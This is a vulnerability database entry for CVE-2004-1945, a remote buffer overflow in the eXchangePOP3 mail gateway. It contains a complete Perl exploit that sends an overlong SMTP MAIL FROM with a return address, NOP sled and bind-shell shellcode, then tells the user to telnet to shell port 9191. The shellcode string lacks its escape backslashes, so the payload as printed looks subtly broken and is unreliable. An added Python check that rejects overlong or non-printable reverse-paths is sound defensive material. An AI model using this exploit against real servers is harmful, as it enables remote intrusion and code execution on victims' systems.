Kinesphere Corporation Exchange POP3 Remote Buffer Overflow Vulnerability

Vulnerability ID: 1107891    Vulnerability type: Boundary condition error
Published: 2004-04-20    Updated: 2005-10-20
CVE ID: CVE-2004-1945
CNNVD ID: CNNVD-200404-076
Platform: Windows    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/24028
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-076
|Vulnerability Details
eXchangePOP3 is a system that downloads messages from Internet mailboxes using the POP3 or IMAP protocol. eXchangePOP3 lacks proper buffer boundary checks on certain mail message fields; a remote attacker can use this to mount a buffer overflow attack against the system and may execute arbitrary instructions with the privileges of the process. Submitting a message whose "MailFrom:" field contains an overlong string to eXchangePOP3 for processing triggers a buffer overflow; carefully crafted data may allow arbitrary instructions to be executed with the process's privileges.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/10180/info

It has been reported that Exchange POP3 e-mail gateway is prone to a remote buffer overflow vulnerability that may allow an attacker to execute arbitrary code on a vulnerable system. This issue could allow an attacker to gain unauthorized access in the context of the affected process.

#!/usr/bin/perl -w

#Exchange pop3 Remote Exploit
#eXchange POP3 is a gateway (connector) that downloads messages from Internet mailboxes
#using the POP3 or IMAP protocol. It then determines the proper recipient(s) for each message
#and sends them to Exchange Server using the SMTP protocol.
#eXchange POP3 can also receive Internet-bound messages from Exchange Server and relay them to
#the Internet. (www.exchangepop3.com )
#by sending a buffer of 1025 bytes we have:
#telnet target 25
#220 xwcf ESMTP
#mail from:<< "A"x1019  server is down
#registers:
#eax=00000000  ebx=00000000 ecx=61616161 edx=77f733b4
#esi=00000000  edi=00000000   esp=01ebf0d0 ebp=01ebf0f0
#eip=61616161
# the other problem lies in the fact that esp does not point at the beginning of our buffer,
# so I chose another approach and looked in another memory zone.
# the ret address can be modified, as well as the size of the buffer, by using windbg.
# the exploit was tested on xp sp1 and win2000 using different shellcodes; the size of the shellcode
# does not have any effect. For the nop, 528999 is the minimal size I could find to land on the ret
# address; you can also modify this value...
# this exploit is used for test only and I am in no case responsible for what you can do.
#greez: simo,abder,marocit,#crack.fr

use Net::SMTP;
$remote = $ARGV[0];
$buffer = "A"x1015;
$ret = "\x80\x1d\xdc\x02";  # Another memory zone
$nop = "\x90"x1999999;
$shellcode =          "xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33".
                      "xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C".
                      "x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE".
                      "x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB".
                      "xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77".
                      "xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77".
                      "xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77".
                      "xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77".
                      "xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77".
                      "xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77".
                      "xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77".
                      "xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77".
                      "xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77".
                      "xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB".
                      "x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C".
                      "xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0".
                      "x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77".
                      "xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0".
                      "xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB".
                      "x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5".
                      "x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98".
                      "xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE".
                      "x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77".
                      "xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8".
                      "x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF".
                      "x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90".
                      "x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74".
                      "xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4".
                      "xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94".
                      "x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5".
                      "xD3x4Ax8Cx88";
if (not $ARGV[0]) {
        print qq~
        Usage: Exch.pl <host>
        ~;
        exit;}
print "+++++++++++++++++++++++\n\n";
print "Exchange pop3 exploit \n\n";
print "Discovered by securma massine \n\n";
print "[email protected] \n\n";
print "+++++++++++++++++++++++\n\n";

$smtp = Net::SMTP->new($remote);
$smtp->mail($buffer . $ret . $nop . $shellcode);
print "\nNow telnet to your cmd shell port 9191 \n";
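Added example (not part of this page or of the exploit's author's code): a defender-side check for the overlong MAIL FROM argument described in the details section and in the exploit's comments. It enforces the RFC 5321 command-line (512 octets) and reverse-path (256 octets) limits and rejects non-printable bytes in the path, so an argument of the size the advisory describes is refused before any gateway copies it into a fixed-size buffer. The SMTP session lines are constructed sample input, not captured traffic.

```python
import re

# RFC 5321 limits: a command line is at most 512 octets including CRLF and a
# reverse-path (the MAIL FROM argument) at most 256 octets. The advisory's
# crash needed about 1025 bytes in one MAIL FROM, far past both limits.
MAX_CMD_LINE = 512
MAX_PATH = 256

MAIL_FROM_CMD = re.compile(rb"^MAIL\s+FROM:", re.IGNORECASE)
MAIL_FROM_PATH = re.compile(rb"^MAIL\s+FROM:\s*<(.*)>\s*$", re.IGNORECASE)


def check_smtp_command(line: bytes) -> str:
    """Classify one SMTP command line (CRLF stripped): "ok", "ignored" for
    commands other than MAIL FROM, or a "reject: ..." reason that a front-end
    proxy or IDS rule can act on before the gateway buffers the argument."""
    if len(line) > MAX_CMD_LINE:
        return "reject: command line exceeds RFC 5321 512-octet limit"
    if not MAIL_FROM_CMD.match(line):
        return "ignored"
    m = MAIL_FROM_PATH.match(line)
    if not m:
        return "reject: malformed reverse-path"
    path = m.group(1)
    if len(path) > MAX_PATH:
        return "reject: reverse-path exceeds RFC 5321 256-octet limit"
    if any(b < 0x20 or b > 0x7E for b in path):
        # A reverse-path is printable ASCII; NOP sleds and shellcode are not.
        return "reject: non-printable bytes in reverse-path"
    return "ok"


def scan_session(lines):
    """Return (line_number, verdict) for every command that is not clean."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := check_smtp_command(line)) not in ("ok", "ignored")]


# Constructed sample session (not captured traffic): a normal sender followed by
# the overlong MAIL FROM shape the advisory describes and two other bad cases.
SAMPLE_SESSION = [
    b"EHLO client.example",
    b"MAIL FROM:<alice@example.org>",
    b"MAIL FROM:<" + b"A" * 1019 + b">",     # ~1031-byte command line
    b"MAIL FROM:<" + b"\x90" * 40 + b"@x>",  # high bytes inside the path
    b"MAIL FROM:bob@example.org",            # angle brackets missing
]

if __name__ == "__main__":
    for n, verdict in scan_session(SAMPLE_SESSION):
        print(f"line {n}: {verdict}")
```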
|References

Source: BID    Name: 10180    Link: http://www.securityfocus.com/bid/10180
Source: SECUNIA    Name: 11449    Link: http://secunia.com/advisories/11449
Source: XF    Name: exchange-pop3-smtp-bo(15922)    Link: http://xforce.iss.net/xforce/xfdb/15922
Source: SECTRACK    Name: 1009882    Link: http://securitytracker.com/id?1009882
Source: BUGTRAQ    Name: 20040527 Re: Exchange pop3 remote exploit    Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108568462428096&w=2
Source: BUGTRAQ    Name: 20040419 Exchange pop3 remote exploit    Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108247921402458&w=2
Source: OSVDB    Name: 5593    Link: http://www.osvdb.org/5593
